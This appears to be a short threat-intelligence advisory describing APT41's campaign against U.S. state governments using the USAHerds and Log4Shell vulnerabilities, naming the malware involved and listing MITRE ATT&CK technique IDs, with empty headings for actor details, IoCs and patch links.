Chinese state-sponsored threat group APT41 targets U.S. critical organizations using two Zero-Days

For a detailed advisory, download the pdf file here

A China state-sponsored threat group known as APT41 is observed compromising at least six U.S. state governments networks in a threat campaign beginning from May 2021. APT41 is a well-known Chinese state-sponsored espionage outfit that targets companies in both the public and commercial sectors and engages in financially motivated behavior for personal benefit.

The threat group exploited two zero-day vulnerabilities, including one in the USAHerds program (CVE-2021-44207) and the now-famous zero-day in Log4j (CVE-2021-44228). After exploiting Log4Shell the actor deployed a new iteration of a modular C++ backdoor known as KEYPLUG on Linux systems. During the attacks, an in-memory dropper dubbed StealthVector was also spotted, which is coordinated to execute the next-stage payload, as well as sophisticated post-compromise tools like DEADEYE. During the espionage operation, adversaries stole personally identifying information from the organizations compromised.

The Mitre TTPs commonly used by APT41 are::

TA0001: Initial AccessTA0007: DiscoveryTA0040: ImpactTA0009: CollectionTA0005: Defense EvasionTA0003: PersistenceTA0011: Command and ControlTA0042: Resource DevelopmentTA0002: ExecutionTA0008: Lateral MovementTA0006: Credential AccessTA0029: Privilege EscalationT1071.001: Application Layer Protocol: Web ProtocolsT1071.002: Application Layer Protocol: File Transfer ProtocolsT1071.004: Application Layer Protocol: DNST1560.001: Archive Collected Data: Archive via UtilityT1197: BITS JobsT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderT1110.002: Brute Force: Password CrackingT1059.001: Command and Scripting Interpreter: PowerShellT1059.003: Command and Scripting Interpreter: Windows Command ShellT1059.004: Command and Scripting Interpreter: Unix ShellT1136.001: Create Account: Local AccountT1543.003: Create or Modify System Process: Windows ServiceT1486: Data Encrypted for ImpactT1005: Data from Local SystemT1568.002: Dynamic Resolution: Domain Generation AlgorithmsT1546.008: Event Triggered Execution: Accessibility FeaturesT1480.001: Execution Guardrails: Environmental KeyingT1190: Exploit Public-Facing ApplicationT1203: Exploitation for Client ExecutionT1133: External Remote ServicesT1083: File and Directory DiscoveryT1574.001: Hijack Execution Flow: DLL Search Order HijackingT1574.002: Hijack Execution Flow: DLL Side-LoadingT1574.006: Hijack Execution Flow: Dynamic Linker HijackingT1070.001: Indicator Removal on Host: Clear Windows Event LogsT1070.003: Indicator Removal on Host: Clear Command HistoryT1070.004: Indicator Removal on Host: File DeletionT1105: Ingress Tool TransferT1056.001: Input Capture: KeyloggingT1036.004: Masquerading: Masquerade Task or ServiceT1036.005: Masquerading: Match Legitimate Name or LocationT1112: Modify RegistryT1104: Multi-Stage ChannelsT1046: Network Service ScanningT1135: Network Share DiscoveryT1027: Obfuscated Files or InformationT1588.002: Obtain Capabilities: ToolT1003.001: OS Credential Dumping: LSASS MemoryT1566.001: Phishing: Spearphishing AttachmentT1542.003: Pre-OS Boot: BootkitT1055: Process InjectionT1090: ProxyT1021.001: Remote Services: Remote Desktop ProtocolT1021.002: Remote Services: SMB/Windows Admin SharesT1496: Resource HijackingT1014: RootkitT1053.005: Scheduled Task/Job: Scheduled TaskT1218.001: Signed Binary Proxy Execution: Compiled HTML FileT1218.011: Signed Binary Proxy Execution: Rundll32T1553.002: Subvert Trust Controls: Code SigningT1195.002: Supply Chain Compromise: Compromise Software Supply ChainT1016: System Network Configuration DiscoveryT1049: System Network Connections DiscoveryT1033: System Owner/User DiscoveryT1569.002: System Services: Service ExecutionT1078: Valid AccountsT1102.001: Web Service: Dead Drop ResolverT1047: Windows Management Instrumentation

Actor Details

Vulnerability Detail

Indicators of Compromise (IoCs)

Patch Link